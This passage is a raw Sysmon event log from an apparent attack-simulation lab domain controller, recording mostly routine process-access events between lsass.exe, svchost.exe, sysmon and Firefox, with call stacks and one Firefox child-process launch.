Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042313Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.096{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042312Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.096{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042311Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.096{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042310Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.095{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042309Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.095{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E491-63C7-3306-00000000AF02}6980C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042308Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.095{FE4C2B44-E48F-63C7-3106-00000000AF02}32963116C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3306-00000000AF02}6980C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000042307Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.095{FE4C2B44-E491-63C7-3306-00000000AF02}6980C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3296.1.1948321554\1082166886" -parentBuildID 20230112150232 -prefsHandle 1684 -prefMapHandle 1680 -prefsLen 25856 -prefMapSize 234522 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a767589c-96f1-4f32-93d4-f9a5a15a1c8d} 3296 "\\.\pipe\gecko-crash-server-pipe.3296" 1696 1fb2fd81058 socketC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x800000000000000042306Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.094{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042305Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.093{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042304Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.093{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042303Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.093{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042302Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.093{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042301Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.093{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042300Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.093{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042299Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.093{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042298Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.092{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042297Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.092{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042296Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.092{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042295Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.092{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042294Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.092{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042293Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.092{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042292Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.091{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042291Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.091{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042290Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.090{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla 